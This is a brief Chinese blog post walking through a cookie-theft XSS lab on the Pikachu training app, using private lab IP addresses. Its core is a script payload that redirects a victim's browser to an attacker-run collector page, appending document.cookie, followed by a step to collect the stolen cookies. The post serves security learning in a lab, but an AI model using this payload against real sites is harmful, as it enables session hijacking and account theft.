xss利用之盗取cookie示例

实验环境
目标网站:宿主机:192.168.10.1
访问 虚拟机win11:192.168.10.134
伪造网站:192.168.10.12:100
pikachu
步骤一:
受害者cookie:

步骤二:
输入xsspayload
'"><script>document.location = 'http://192.168.10.12:100//pkxss/xcookie/cookie.php?cookie='+document.cookie</script>

步骤三:
在伪造网站中提取受害者cookie

posted @ 2024-02-28 21:13  LaiBuNiZi  阅读(56)  评论(0)    收藏  举报